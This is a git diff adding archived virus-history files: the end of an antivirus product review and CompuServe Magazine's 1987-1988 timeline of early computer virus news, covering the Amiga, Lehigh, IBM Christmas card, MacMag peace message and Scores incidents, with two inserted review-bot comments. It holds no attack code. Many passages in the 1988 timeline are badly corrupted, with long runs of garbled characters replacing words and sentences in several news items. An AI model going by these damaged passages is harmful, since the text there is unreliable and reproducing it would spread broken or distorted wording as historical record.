+ o VCheck, version 1.1E, is available in a file called + VCHECK.ZIP on the NCSA BBS. Pricing: "If you use + VCHECK, send a registration of $25 to + Systemberatung Axel Dunkel, Robert-Schuman-Ring + 37, D 6239 Kriftel, West Germany." + + o VirusGuard. + + + + SOME OBSERVATIONS + + + +Once again, the correlation between price and value is upset. +Many of our highest scoring packages were the cheapest. + +We note also the contradiction betwen our ratings and those +published elsewhere. 
The documentation accompanying Checkout +notes that the product is Compute!'s PC Magazine Editors choice +for virus protection, is the featured virus detection system in +Dvorak and Anis' "Dvorak's Guide to PC Telecommunications", +etc. We found it at the bottom of our scoring system. You may +wish to review our ratings of this product. + + + + OTHER EVALUATION CONSIDERATIONS + + + +We did not compare products on the following items, but you +may wish to: + + o Can the program work on files with hidden, system, + read-only attributes. + + o Can the program work from floppy disk? This is + valuable if you wish to use the program to monitor + another user's machine, for instance, to see if they are + clandestinely running a golf game that is not on the + approved corporate software list. It is also valuable for + guarding against stealth viruses. + + o Can the program produces separate lists of deleted + files, added files, and changed files? Separate lists may + have benefits over a massive list of changes. + + o Do you have control over whether the program updates + its baseline database? If the program updates this + everytime it is run, you will lose your history file. + + + + +++++ + + \ No newline at end of file diff --git a/textfiles.com/virus/csvir87.vir b/textfiles.com/virus/csvir87.vir new file mode 100644 index 00000000..8d7c430e --- /dev/null +++ b/textfiles.com/virus/csvir87.vir 
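Review bot: the "o VirusGuard." entry at the end of the product list carries no availability, author or pricing text, unlike every other entry in the list; if the archived source is truncated at that point, say so in the commit message rather than leaving readers to wonder whether text was dropped on import. The spelling slips in the added text ("commerical", "betwen", "everytime", "Can the program produces") are in the source document and belong to the archival copy, so they need no change here.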
@@ -0,0 +1,90 @@ +The following text is copyright (c) 1987-1990 CompuServe Magazine +and may not be reproduced without the express written permission of CompuServe. + +CompuServe Magazine's Virus History Timeline + +CompuServe Magazine is published monthly by the CompuServe Information +Service, the world's largest on-line information service with over 600,000 +subscribers worldwide. + +If you would like to become a CompuServe subscriber, call +1-800-848-8199 to receive a copy of the CompuServe Information Service +membership kit. + +- 1987 - + + +"VIRUS" INFECTS COMMODORE COMPUTERS + + (Nov. 20) + A "virus" has been infecting Commodore's Amiga computers, and what was once +considered an innocent bit of hacking has turned into a disaster for some users. + The "virus" is a secret modification to the boot block, an area on many disks +using operating system facilities of the Amiga. In addition to its transparent +purpose --- starting the operating system -- the virus contains code that can +infect other disks. Once a virus infected disk is used on a computer, the +computer's memory becomes a breeding ground and all other bootable disks that +find their way to that computer will eventually become infected. Any exchange of +diskettes with another computer then infects the new computer. + Although the original intention of the virus apparently was benign, it may +have spread to thousands of Amiga computers and disrupted their normal +operations. Since some commercial software developers use coded information in +the boot block of their distribution disks, the virus can inadvertently damage +these disks and render the software useless. Knowledgeable users say the virus +was meant to be a high-tech joke that displayed a message after it had +completely infiltrated a user's disks library. + According to Amiga technical support personnel, the only sure way for users to +keep the virus out of their systems is to avoid warm starting the computer. 
It +should always be 'wered down first. + --James Moran + + +VIRUS MOVES TO IBM COMPUTERS + + (Dec. 7) + On the heels of the Amiga virus, reported recently in Online Today, a new +apparently less benign virus has been making the rounds of IBM personal +computers. The IBM-related virus was first noted at Lehigh University where, +last week, a representative in the User Services section reported its discovery +by student consultants. + As with other similar viruses, this one is spread by means of an infected +system file. In this case, a hacked version of IBM's COMMAND.COM processor is +the host that harbors the virus. Once infected, the host PC will then infect +the first four computers with which it comes in contact. In all cases, the virus +is spread through an illegally modified version of the IBM command processor. + Once the host has infected four other computers, the host virus is reported to +purposely destroy the boot tracks and allocation tables for all disks and +diskettes that are online to the host computer. The action renders the disks +completely unreadable, even when reconstructs are attempted with popular disk +repair software. + The consultant at Lehigh University who first alerted general users to the +virus says that it can be detected by examining the date on the COMMAND.COM +file. A recent date would suggest that the file had been illegally modified. + --James Moran + + +CHRISTMAS GREETINGS MESSAGE TIES UP IBM'S ELECTRONIC MAIL SYSTEM + + (Dec. 12) + IBM nearly lost its Christmas spirit yesterday. It seems that a digital +Christmas card sent through its electronic mail system jammed computers at +plants across the United States for up to 90 minutes. + The Associated Press quotes IBM spokesman Joseph Dahm as saying the incident +caused no permanent damage, but forced the company to turn off links between +computer terminals for a while. 
+ AP says, "Curious employees who read the message discovered an illustration of +a Christmas tree with 'Holiday Greetings' superimposed on it. A caption advised, +'Don't browse it, it's more fun to run it.' Once a person opened the computer +message on their screen, it rarely accepted a command to stop the message from +unfolding on the screen. As a result, several people shut off their computers +and lost reports or mail that had not previously been filed." + Apparently the message also automatically duplicated itself and was sent to +other workstations. + Online plants in Texas and New York were affected, Dahm said. Meanwhile, +sources said that other facilities in Charlotte, N.C.; Lexington, Ky.; +California and Europe also received the message. + Federal agents even may investigate the incident, the wire service says, since +the message apparently crossed state lines. + --Charles Bowen + + \ No newline at end of file diff --git a/textfiles.com/virus/csvir88.vir b/textfiles.com/virus/csvir88.vir new file mode 100644 index 00000000..4e068e44 --- /dev/null +++ b/textfiles.com/virus/csvir88.vir 
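Review bot: the sentence "It should always be 'wered down first." in the Nov. 20 Amiga item has lost characters (the context calls for "powered down"), which reads like transcription damage rather than the author's text; check whether an undamaged copy of csvir87.vir exists before importing this one, or record in the commit message that the file is added as received from the archive. The dash usage in "transparent purpose --- starting the operating system -- the virus" is inconsistent but appears to be how the source renders it, so it can stay.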
@@ -0,0 +1,1758 @@ +The following text is copyright (c) 1987-1990 CompuServe Magazine +and may not be reproduced without the express written permission of CompuServe. + +CompuServe Magazine's Virus History Timeline + +CompuServe Magazine is published monthly by the CompuServe Information +Service, the world's largest on-line information service with over 600,000 +subscribers worldwide. + +If you would like to become a CompuServe subscriber, call +1-800-848-8199 to receive a copy of the CompuServe Information Service +membership kit. + + +- 1988 - + + +COMPUTER VIRUS THREATENS HEBREW UNIVERSITY'S EXTENSIVE SYSTEM + + (Jan. 8) + In Jerusalem, Hebrew University computer specialists are fighting a deadline +to conquer a digital "virus" that threatens to wipe out the university's system +on the first Friday the 13th of the year. That would be May 13. + Associated Press writer Dan Izenberg says the experts are working on a +two-step "immune" and "unvirus" program that could knock down the vandalized +area of the system. + "Viruses" are the latest in computer vandalism, carrying trojan horses and +logic bombs to a new level, because the destructiveness is passed from one +infected system to another. Izenberg quotes senior university programmer Yisrael +Radai as saying that other institutions and individual computers in Israel +already have been contaminated. + "In fact," writes the wire service, "anyone using a contaminated computer disk +in an IBM or IBM-compatible computer was a potential victim." + Radai says the virus was devised and introduced several months ago by "an +evidently mentally ill person who wanted to wield power over others and didn't +care how he did it." + AP describes the situation this way: + "The saboteur inserted the virus into the computer's memory and the computer +then infected all disk files exposed to it. Those disk files then contaminated +healthy computers and disks in an electronic version of a contagious cold." 
+ Apparently, the intruder wanted to wipe out the files by Friday, May 13, ΁+haW:ѕimpatient, because +he then had his virus order contaminated +programs to slow down on Fridays and on the 13th day of each month. + Radai thinks that was the culprit's first mistake, because it allowed +researchers to notice the pattern and set about finding the reason why. + "Another clue," says AP, "was derived from a flaw in the virus itself. Instead +of infecting each program or data file once, the m!l`gnant orders copied +themselves over and over, consuming increasing amounts of memory space. Last +week, experts found the virus and developed an antidote to diagnose and treat +it." + Of viruses in general, computer expert Shai Bushinsky told AP, "It might do to +computers what AIDS has done to sex. The current free flow of information will +stop. Everyone will be very careful who they come into contact with and with +whom they share their information." + --Charles Bowen + + +TAMPA COMPUTERISTS FIGHT VIRUS + + (Jan. 10) + Tampa, Fla., computerists say they are fighting a digital "virus" that sounds +as if it may be th}ame`ɽɅr݁ե +ٕͥJRale[H +́reported earlier, Hebrew University computer specialists are contending +with a virus program that threatens to wipe out the university's system on the +first Friday the 13th of the year -- May 13. The Jerusalem team is working on a +two-step "immune" and "unvirus" program that could knock down the vandalized +area of the system. + Meanwhile, members of the Tampa Amiga User's Group now tell United Press +International that they, too, are fighting a computer virus, and UPI quotes one +expert as saying a version of that vandalizing program also is designed to begin +destroying files on May 13. + Computer viruses are self-propagating programs that spread from one machine to +another and from one disk to another, a sort of new generation of more +destructive trojan horses and logic bombs. 
+ "It kinda creeps up on you," president Jeff White of the Amiga group told the +wire service, adding that the group's membership was infiltrated by the program. + UPI reports, "Experts don't yet know what, if any, damage the virus can cause +to the disks or programs. Similar problems have erased programs and information. +... White said the program spread itself to more than 20 of his floppy disks +before he discovered it. But by then, the program had spread to the disks of +many of the club's members via its regular disk-of-the-month distribution." + White said he doesn't know how the bug got to Tampa, but suspects it came from +West Germany on a disk from an overseas user group. + "White said the program works invisibly," says UPI. "When the computer is +turned on, the program stores itself in the machine's main memory and then +begins spreading copies of itself to new disks used in the machine." + He added that the Tampa club members now use a "virus-checker" program to test +disks to prevent another infection. + --Charles Bowen + + +VIRUS PROGRAMS COULD HAVE USEFUL APPLICATIONS, SAYS COLUMNIST + + (Jan. 11) + Despite all the recent negative publicity about computer "viruses" -- +self-propagating programs that spread from one machine to another in way that +has been called the computer version of AIDS -- a California computer columnist +says there could be a positive result. + Writing in The San Francisco Examiner, John Markoff observes, "In the future, +distributed computing systems harnessed by software programs that break tasks +into smaller parts and then run portions simultaneously on multiple machines +will be commonplace. In the mid-1970s computer researchers John Shoch and Jon +Hupp at Xerox's Palo Alto Research Center wrote experimental virus programs +designed to harness many computers together to work on a single task." 
+ Markoff points out that some of the programs in that work functioned as "'town +criers' carrying messages through the Xerox networks; others were diagnostic +programs that continuously monitored the health of the computers in the +networks." + Also the researchers called one of their programs a "vampire worm" because it +hid in the network and came out only at night to take advantage of free +computers. In the morning, it disappeared again, freeing the machines for human +users. + For now, nonetheless, most viruses -- particularly in the personal computing +world -- are viewed as destructive higher forms of trojan horses and logic +bombs. + Markoff traces the first virus to the military ARPAnet in 1970. On that +system, which links the university, military and corporate computers, someone +let loose a program called "creeper." + Notes the paper, "It crawled through the network, springing up on computer +terminals with the message, 'I'm the creeper, catch me if you can!' In response, +another programmer wrote a second virus, called 'reaper' which also jumped +through the network detecting and 'killing' creepers." + Markoff also pointed out that Bell Labs scientist Ken Thompson, winner of the +prestigious Turing Award, recently discussed how he created a virus in the lab +to imbed in AT&T's Unix operating system, which he and colleague Dennis Ritchie +designed. + In a paper, Thompson noted how he had embedded a hidden "trapdoor" in the Unix +log-on module each time it created a new version of the operating system. The +trapdoor altered the log-on mechanism so that Unix would recognize a password +own only to Thompson. + Thompson and Ritchie say the Unix virus never escaped Bell Labs. + --Charles Bowen + + +SUBSCRIBER, SYSOP BLOCK POSSIBLE "VIRUS" IN APPLE HYPERCARD FORUM + + (Feb. 
8) + Quick reactions by a subscriber and a veteran forum administrator have blocked +a possible computer "virus" program that was uploaded over the weekend to +CompuServe's new Hypercard Forum. + The suspicious entry was an Apple Hypercard "stack" file called "NEWAPP.STK," +which was uploaded Friday to the forum's Data Library 9, "HyperMagazines." It +was online for about 24 hours before it was caught. + Subscriber Glenn McPherson was the first to blow the whistle. Saturday night +McPherson posted a message saying that when he ran the application, the file +altered his Macintosh's systems file. "I don't know why it did this," he wrote, +"but no stack should touch my system file." + Neil Shapiro, chief forum administrator of the Micronetworked Apple Users +Group (MAUG), quickly investigated and removed the suspicious file. + In a bulletin to the membership, Shapiro warned those who already had +downloaded NEWAPP.STK that the stack would alter the system files with unknown +results. He also warned against using system files from any disk that was run +while the NEWAPP.STK's modified system was in effect. + Said Shapiro, "If you run NEWAPP.STK, it will modify the system on the disk it +is on so that the system's INITs contain an INIT labeled 'DR.' Then, if you use +another system with the DR-infected system as your boot system, the new system +will also contain the self-propagating 'DR' INIT Resource. While it is possible +to, apparently, 'cut' this resource from infected systems with the Resource +Editor, the only sure course of action is to trash any system file that has come +in contact with this stack." + It was not immediately known if the system alternations were deliberately or +accidentally programmed into NEWAPP.STK. Shapiro notes the file's uploader has +been locked off the entire system and that "he will be contacted by CompuServe +and/or myself." 
+ Computer "viruses" -- self- propagating programs that infect system files and +then spread to other disks -- have been in the news for the past six months. To- +date, most of their targets have been regional computer users groups, private +and semi-public networks and stand-along bulletin board systems. This apparently +is the first report of a virus-like program on a national consumer information +service. + Shapiro says in his bulletin that in eight years of the various Apple forums' +operation, this is the only such occurrence. + "While I, of course, cannot say it will be the last, I still have just as much +confidence as always in the fact that 99.99999999% of the Mac community are +quite trustworthy and that there is no real need to fear downloads," he wrote. + Shapiro also urged his membership, "If you have not used (NEWAPP.STK) yet, do +not! If you have uploaded it to other BBS or network systems, please immediately +advise the sysops there of the problem. If you have placed it on a club disk, +please be certain to remove it from that disk before distribution and -- if it +has been run from the 'Master' disk already -- don't just remove it, but trash +the system." + Subscriber McPherson indicates the suspect file already has spread to other +systems. His forum note says he found the same stack program also in a software +library on the General Electric's GEnie network. + --Charles Bowen + + + +DOD TRIES TO PROTECT ITS COMPUTERS FROM ELECTRONIC VIRU + (Feb. 9) + Just as a medical virus can spread rapidly, so does the deadly computer virus +seem to be making the rounds. + In an effort to inoculate itself against an outbreak, the Department of +Defense has taken steps to prevent the electronic sabotage from affecting its +computers, reports Government Computer News. + The computer viruses are self- propagating programs that are designed to +spread automatically from one computer to another and from one disk to another, +totally disrupting normal operations. 
+ As reported in Online Today, such viruses have already struck computer systems +at Hebrew University in Jerusalem and IBM Corp.'s regional offices in Tampa, +Fla. + "It can spread through computer networks in the same way it spreads through +computers," said DOD spokeswoman Sherry Hanson. "The major problem areas are +denial of service and compromising data integrity." In addition to basic +security measures, computer scientists at the National Security Agency are +installing programming tools and hardware devices to prevent the infiltration of +virus programs. Hanson told GCN that DOD is also using specialized ROM devices +and intrusion detectors. The virus only comprises a few lines of programming +code and is easy to develop with few traces. + After IBM was infiltrated last December with an innocent- looking Christmas +message that kept duplicating itself many times over and substantially slowed +the company's massive message system, specialists installed a filter program to +monitor the system and protect against further intrusion. + According to GCN, executable programs can't be traj3erred from one computer +to another within IBM's networi + YͽѕɁ͕́ +ɕɥ́́BJ +5Rcomute.jumemory. For instance, almost the entire membership of a Florida +Commodore Amiga users group was infected by a virus before it was discovered. + The president of the group said he believed the virus originated in Europe on +a disk of programs the group received from an overseas source. The club now has +a checker program to check disks for viruses before they are used. + Al Gengler, a member of the Amiga group, compared the virus to AIDS. "You've +got to watch who you compute with now," he said. + --Cathryn Conroy + + +EXPERTS SEES TWO SCENARIOS FOR THE COMPUTER "VIRUS" PROBLEM + + (Feb. 
9) + Don Parker, who heads the information security program for the Menlo Park, +Calif., SRI International, has been studying the problem of computer "viruses" +and now says he see two possible directions in the future. + Speaking with Pamela Nakaso of the Reuter Financial News Service, Parker said +his scenarios are: + -:- One, that viruses will be too difficult to design and use for +infiltration, and that interest in using them as "weapons" will die away. + -:- Or, two, viruses will increase in destructiveness as more sophisticated +saboteurs use them to destroy the public domain software resources available. + Nakaso also quotes editor Harold Highland of the magazine Computers and +Security as saying that "hysteria" over the few documented incidents may fuel +even more viruses, which are defined as self-propagating files that usually +damage a computer's systems files and then spread to other disks. + Highland pointed out that in a recent Australian virus case among Amiga +computers, one tabloid newspaper reported the incident with a headline that +sp`ned the entire cover, reading, "Terror Strikes in the DP Industry." + Parker told Reuter, "The vulner`ility is growing at the same rate as the +number of computers and number of communications with computers." + Nakaso writes, "Parker estimates that of the 2,000 cases of documented +computer crime he has compiled at SRI, about 20 to 30 have been virus attacks. +There is no question, however, the reported incidents are rising, and they are +expanding beyond personal computers to mainframes and other networks." + --Charles Bowen + + + +COMPUTER VIRUS CALLED FRAUD + + (Feb. 10) + Comp}dr viruses may be frauds. Although lots of people are talking about +computerdoms latest illicit fad, to date, no one has produced a copy of a living +breathing virus. Now, a University of Utah expert on urban legends thinks that +the dreaded virus may be have become the high tech version of the bogey man. 
+ Professor Jan Harold Brunvand has written three books about urban legends and +he seems to think that the virus is just the latest incarnation in a long line +of legends. Brunvand, and others, have pointed out that there are striking +similarאV +=r˸Ḱof the virus and legends such as the cat in the +microwave oven. For one thing, there are lots of reported sightings but no +concrete evidence. And urban legends always seem to appear and affect those +things about which urban dwellers are just coming to terms with: shopping malls +and microwave ovens in the 70's, computers in the 80's. + In doayg +͕ɭѕɁс"ɽ́J́zݹɝ"х5Rcrtaily qualifies as the stuff about which legends are made. +Even the way in +which the deed is accompli.HY6́mystical qualities: a computer wizard works +strange magic with the secret programming codes of a computer operating system. + Brunvand, a computer owner himself, says that although viruses could be +created, he has found absolutely no evidence to support claims about their +existence. + --James Moran + + + +HYPERCARD VIRUS JUDGED "HARMLESS" + + (Feb. 12) + Administrators of a CompuServe forum supporting the Apple Hypercard technology +have confirmed that a file uploaded to their data libraries last weekend did +indeed contain a so-called computer "virus." + However, they also have determined the program apparently was harmless, meant +only to display a surprise message from a Canadian computer magazine called +MacMag. + As reported earlier this week, forum administrator Neil Shapiro of the +Micronetworked Apple Users Groups (MAUG) removed the suspicious entry, a +Hypercard "stack" file called "NEWAPP.STK," after a forum member reported that +the file apparently altered his Macintosh's system files. + Computer "viruses," a hot topic in the general press these days, have been +defined as self-propagating programs that alter system files and then spread +themselves to other disks. 
+ Since removing the file last weekend, the Apple administrators have been +examining the file and now Shapiro says it apparently was designed merely to +display a message from MacMag on March 2. + On the HyperForum message board G2APPHYPER), Shapiro reports, "Billy +Steinberg was able to reverse engineer (disassemble) the INIT that the virus +places into system files. The good news is that the virus is harmless. But it +*is* a computer virus." + Shapiro says that if the downloaded file remained in the user's system, then +on March 2, the screen would display: + "Richard Brandnow, publisher of MacMag, and its entire staff would like to +take this opportunity to convey their universal message of peace to all +Macintosh users around the world." + Apparently the file is so designed that after March 2 it removes itself from +the 떮.em\ + Shapiro notes that, while this file apparently is harmless, it still raises +the question of the propriety of database entries that quietly alter a user's +system files. + Shapiro said he has spoken to publisher Brandnow. "It was not his intention to +place it in a HyperCard stack nor to have it on (CompuServe)," Shapiro writes. +"What he did do was to develop the INIT in December and 'left' it on their +(MacMag's) own machines with the hope that 'it would spread.'" + Subsequently, someone else apparently captured the file, added it to his +"stack" and uploaded to the CompuServe forum and other information services. + While Brandnow maintains the system-altering INIT file was harmless, Shapiro +says he's concerned about what the NEWAPP.STK incident could represent. + "While the INIT itself is non-destructive," Shapiro wrote, "I believe it was +at least irresponsible for MacMag to have perpetrated this type of problem and +to have caused the confusion that they did. I also fear that this could give +other people ideas on less peaceful uses of such a virus. 
+ "I belede that MacMag has opened here a Pandora's Box of problems which will +haunt our community for years. I hope I am wrong." + --Charles Bowen + + +PUBLISHER DEFENDS HIS "VIRUS" PROGRAM AS "GOOD FOR COMMUNITY" + + (Feb. 13) + The publisher of Canadian computer magazine MacMag contends the computer +"virus" program his staff initiated recently was not only harmless but was "good +for the Macintosh community." + Says 24-year-old Richard Brandow, "If other people do nasty things (with virus +programs), it is their responsibility. You can't blame Einstein for Hiroshima." + Speaking by phone with reporter Don Clark of The San Francisco Chronicle, +Brandow maintained his magazine's virus program, which spread through the Apple +Macintosh community this week on this continent and apparently reached Europe, +was intended to do nothing more than display a "peaceful" message on Mac screens +on March 2, the first anniversary of the introduction of the Apple Mac II. + Of the so-called "virus" technology, Brandow said, "This message is very good +for the Macintosh community." + The controversy centered around an Apple Hypercard "stack" file called +"NEWAPP.STK" that was uploaded to various public domain databases around the +country, including the data library of CompuServe's HyperForum (G APPHYPER). + When subscribers discovered that the file quietly altered their Mac's system +files when it was executed, a warning was posted and forum administrator Neil +Shapiro immediately removed the data library entry. Only after the forum's +sysops had disassembled the suspect file could it be determined that +NEWAPP.STK's only apparent function was to display a March 2 greeting from +Brandow and the MacMag staff. + HyperForum members now have been informed that the file, while indeed a +"virus," apparently is harmless. However, Shapiro contends MacMag staffers were +"at least irresponsible ... 
to have perpetrated this type of problem and to have +caused the confusion that they did." + Shapiro is quoted in The Chronicle as adding, "This is very similar to someone +breaking into your home and writing a message of good will in red lipstick on +your wall. It is a violation of the right of private property... Our computers +are machines that belong to us and other people should remain out of them." + On the other side of the argument, Brandow told the paper, "The idea behind +all this is to promote peaceful methods of communication between individuals +using harmless ways." + Montreal-based MacMag, with a circulation of 40,000, is Canada's only +Macintosh magazine. Brandow also heads a 1,250-member Mac user group, which he +says is Canada's largest. + Brandow told Clark that programmers worked more than a year on the virus, +adding that it was inspired by two groups, known as "The Neoists" and "The +Church of!he SubGenius." (He said the latter was formed in Texas as a satire on +fundamentalist religion and inspired a 1983 book.) + As noted here earlier, the MacMag virus also reached beyond CompuServe to +other information services and private bulletin board systems. For instance, The +Chronicle quotes General Manager Bill Louden of General Electric's GEnie as +saying that about 200 users downloaded the file from that information service +before it was discovered and removed early Monday. Meanwhile, Shapiro told Clark +that only about 40 of CompuServe's subscribers retrieved the file before it was +removed early Sunday. + The Chronicle says that Mac devotees in the Bay Area were "stunned" by news of +the virus, but not all were upset. For example, Apple wizard Andy Hertzfeld, a +co-designer of the original Mac, told the paper, "As far as I'm concerned, it +doesn't have any malicious intent and is just some people having fun. I don't +see why people are so uptight." 
+ Meanwhile, a spokeswoman for Apple at company headquarters in Cupertino, +Calif., said the company is searching for details of the virus and could not +comment on it at present. + --Charles Bowen + + + +TWO FIRMS OFFER TO "INOCULATE" US AGAINST THE COMPUTER "VIRUSES" + + (March 4) + The debate continues over whether computer "viruses" are real or just the +latest urban legend, but at least two companies are hoping that we don't want to +take any changes. + Independent of each other, the firms this week both claimed to have the first +commercial software to "inoculate" systems against those reported rogue programs +that damage data and systems files. + One of the companies, Lasertrieve Inc. of Metuchen, N.J., introduced its +VirALARM product during Microsoft Corp.'s CD-ROM conference in Seattle. + In addition, in Stockholm, a Swedish company called Secure Transmission AB +(Sectra) today announced a similar anti-virus program called TCELL, after a +counterpart in human biology. + A Lasertrieve statement contends that previous anti-viral software utilities +-- mostly offered in the public domain -- work by drawing attention to the +virus's attempted alterations of system files, noting a change of file size, or +monitoring the dates of program changes. However, the New Jersey firm contends, +this approach makes such programs "easily fooled by sophisticated viruses." + Lasertrieve says its VirALARM contains a program designed to protect another +program, creating a software "barrier." According to the statement, before +anyone can use the protected program, VirALARM checks to determine whether the +program has been altered since it was inoculated. If there has been any change, +the software then blocks use of the altered program, notifies the user and +suggests a backup copy of the program be substituted. 
+ Meanwhile, Bo-Goran Arfwidsson, marketing director of the Swedish company, +told Bengt Ljung of United Press International that its TCELL "vaccine" gives a +database a partial outside protection, sounds an alarm if a computer virus +appears inside a database and identifies the infected file so it can be +isolated. The contaminated part then can be replaced with a backup file. + Sectra spokesman Torben Kronander said that TCELL has been "tested for a year +now and ther% `s no question that it works," adding that since early 1987 the +software has functioned on computers of major Swedish manufacturing companies. +Arfwidsson declined to name those companies for security purposes. + Kronander said TCELL simply made the task of creating a virus so complicated +that only vast computer systems would be able to carry it out. "We've +effectively removed the hacker type of attack, and these have been the problem. +It will take the resources of a major software producer or a country to produce +a virus in the future." + UPI says Sectra is a 10-year-old research company with 19 employees in +Linkoping in central Sweden, closely tied to the city's Institute of Technology. + --Charles Bowen + + + +"VIRUS" SPREADS TO COMMERCIAL PROGRAM; LEGAL ACTION CONSIDERED + + (March 16) + That so-called "benign virus" that stirred the Apple Macintosh community +earlier this year when it cropped up in a public domain file in forums on +CompuServe and other information services now apparently has invaded a +commercial program called FreeHand. + The publisher, Seattle's Aldus Corp., says it had to recall or rework some +5,000 FreeHand packages once the virus was discovered and now is considering +legal action against those who admitted writing the self- propagating program. + Meanwhile, other major software companies reportedly are worried that the +virus may have affected some of their products as well. 
+ At the heart of the controversy is a "peace message" that Canadian Richard +Brandow, publisher of Montreal's MacMag magazine, acknowledged writing. As +reported here earlier, that file was designed to simply pop up on Mac screens7round the world on March 2 to +celebrate the first anniversary of the release of +the Macintosh II. However, many Mac users reacted angrily when they learned that +the file quietly had altered their systems files in order to make the surprise +message possible. + Now the virus has re-emerged, this time in FreeHand, a new Mac program Aldus +developed. Aldus spokeswoman Laury Bryant told Associated Press writer George +Tibbits that Brandow's message flashed when the program was loaded in the +computer. + Bryant added that, while it "was a very benign incident," Aldus officials are +angry and "are talking with our attorneys to understand what our legal rights +are in this instance.... We feel that Richard Brandow's actions deserve to be +condemned by every member of the Macintosh community." + This may be the first instance of a so-called "virus" infecting commercial +software. + Tibbits says the Brandow virus apparently inadvertently spread to the Aldus +program through a Chicago subcontractor called MacroMind Inc. + MacroMind President Marc Canter told AP that the virus appears to have been in +software he obtained from Brandow which included a game program called "Mr. +Potato Head," a version of the popular toy. + Canter said that, unaware of the digital infection, he ran the game program +once, then later used the same computer to work on a disk to teach Mac owners +how to use FreeHand. That disk, eventually sent to Aldus, became infected. Then +it inadvertently was copied onto disks sold to customers and infected their +computers, Canter said. + Upset with Brandow, Canter says he also is considering legal action. For his +part, Brandow says he met Canter, but denied giving him the software. 
+ The whole incident apparently has some at other companies worried because they +also use Canter's services. Tibbits says that among MacroMind's clients are +Microsoft, Ashton-Tate, Lotus Development Corp. and Apple Computers. A-T has not +commented, but officials at Microsoft, Apple and Lotus all told AP that none of +their software was infected. + Ma!while, Brandow told Tibbits that, besides calling for world peace, the +virus message was meant to discourage software piracy and to encourage computer +users to buy original copies. + The full message read: "Richard Brandow, the publisher of MacMag, and its +entire staff would like to take tZl.Htuniy o convey their universal +message of peace to all Macintosh users around the world." Beneath that was a +picture of a globe. + +BranKw`XZсzɥB*ѕjѡɥ镑́z5RɅ́zjձ +́Jjɕearea and possibly +a few other areas of Canada and the United States. However, he said he was +shocked later to find that, after the virus program began to appear in the +databases of online information services, an estimated 350,000 people in North +America and Europe saw the message pop up on their computers on March 2. + --Charles Bowen + + +THREAT OF "VIRUS" BLOWN OUT OF PROPORTION, NORTON AND SYSOPS SAY + + (April 10) + The threat of so-called computer "viruses" has been vastly overrated, +according to software guru Petr2Norton and two CompuServe forum administrators. + "We're dealing with an urban myth," Norton told Insight magazine. "It's like +the story of alligators in the sewers of New York. Everyone knows about them, +but no one's ever seen them. Typically, these stories come up(wery three to +five years." + Don Watkins, administrator of CompuServe's IBM Users Network forums (GO +IBMNET) also told the general interest magazine that he's more concerned about +being hit by a meteor than a computer virus. + "In five years," Watson said, "I've seen only one program that was designed to +do intentional damage. 
That was about three yeaW`֋ +Jс͹5Rѥѕj +@""I@have never spoken to anyone who personally, firsthand, has ever seen or +experienced a program like this," Watson added, "and my job keeps me itouchM +Źźͅzj$ ComuS˹W2յadministrators check each piece of user-contributed software +before posting it in data libraries for general distribution. + The alleged virus problem received widespread attention in early March when an +unauthorized message was placed onto Freehand, a commercial software product for +the Apple Macintosh published by Aldus Corp. Earlier, the same message +circulated in several information services and was uploaded to CompuServe's +Hyper Forum, a forum devoted to the Hypertext technology that is part of the +Micronetworked Apple Users Groups (GO MAUG). + The message read "Richard Brandow, publisher of MacMag, would like to take +this opportunity to convey a universal message of peace to all Macintosh users." +It then erased itself without doing any harm. + Of the situation, Neil Shapiro, MAUG's chief sysop, said, "The whole problem +has been completely hyped out of proportion." + --Daniel Janal + + +COMPUTER VIRUS NEWSLETTER DEBUTS + + (April 13) + If you want to follow all the latest news on insipid computer viruses, you +might be interested in the debut of "Computer Virology," a newsletter devoted to +identifying and analyzing those annoying computer diseases. + Produced by Director Technologies Inc., the developers of Disk Defender, a +hardware device that write protects PC hard disks, the newsletter will be +published monthly. Topics will include developments for protection against the +viruses, precautions and procedures to follow to insure that terrorists not let +loose this rampant epidemic. 
+ "The latest strain of computer viruses presently causing serious damage at +university labs, scientific research facilities, hospitals and business +organizations worldwide, has created a very real concern for the future of +having free access to the tremendous amounts of information that are now readily +available for unlimited use," said Dennis Director, president of Director +Technologies. + "The potential dangers of such viruses is that they can be used not only as a +means to facilitate malicious pranks in the home computer area, but also pose a +real `terrorist' threat to academic computing labs, scientific research projects +and business. Data loss can cost hundreds of thousands of dollars in real money, +as well as in wasted man-hours." + The newsletter is distributed free of charge. For information or to subscribe, +contact Director Technologies Inc., 906 University Pl., Evanston, IL 60201. +312/491-2334. + + +SIR-TECH UNVEILS ANTI-VIRUS + + (April 14) + Sir-tech Software Inc., the Ogdensburg, N.Y., firm best known for its +recreational programs such as the acclaimed "Wizardry" series of adventure +games, now has released a free program called "Interferon, the Magic Bullet" +that it says is meant to "halt the devastation of computer virus." + A company statement reports that Robert Woodhead, 29-year-old director of +Sir-tech's Ithaca, N.Y., development center, designed the Apple Macintosh +program to "detect and destroy the highly-publicized computer virus which +threatens the integrity of the world's computer systems." + Sir-tech says the program will be offered free for downloading from related +services o QompuServe and GEnie. In addition, it is available by mailing a +diskette with a self-addressed, stamped envelope to Sir-tech, 10 Spruce Lane, +Ithaca, N.Y. 14850. + While the program itself is free, Woodhead asks for donations to a fund +established to buy computer equipment for visually impaired users. 
A notice in +the software gives details on the fund. + Woodhead said he has worked since early this year to come up with Interferon, +named for the antiviral treatment for cancer. "Just as a virus leaves clues in a +human body, the computer virus is detectable if users know what to look for," +Woodhead said. + The Inter~on`Ʌ́́сѕɁ͕́j +́5RɕɁJѥ +JѕсɕJ́ѡ +ͱ5Rstatement`XZӷVѥcan be cured by deleting the diseased files," it +added. "As new viruses are discovered, Interferon will be updated for instant +detection." + --Charles Bowen + + + +NEW VIRUS PLAGUES MACINTOSHES AT NASA AND APPLE + + (April 18) + Apple Macintosh computers at the National Aeronautics and Space Administration +and at Apple Computer as well as other business offices around the country have +caught a new computer virus, reports0Nwsdayn +@"Thebѕсhigh-tech plague is under investigation by Apple and federal +autGities. + During the past three weeks, Apple has been receiving reports of a virus +called Scores. Although it has not been known to erase any data, it can cause +malfunctions in printing and accessing files and can cause system crashes, +Cynthia Macon of Apple Computer told Newsday. + Two hundred of the 400 Macintosh computers at the Washington, D.C. offices of +NASA have been infected. Many of them are connected to local area networks and +are spreading the virus. "This particular virus does not attack data. We have +no record indicating anyone lost anything important," said Charles Redmond, a +NASA spokesman. + Newsday notes that the Scores virus can be detected by the altered symbols +that appear in Scrapbook and Note Pad, two Macintosh files. Instead of the Mac +logo, users see a symbol that looks like a dog-eared piece of paper. Two days +after the virus is transmitted, it is activated and begins to randomly infect 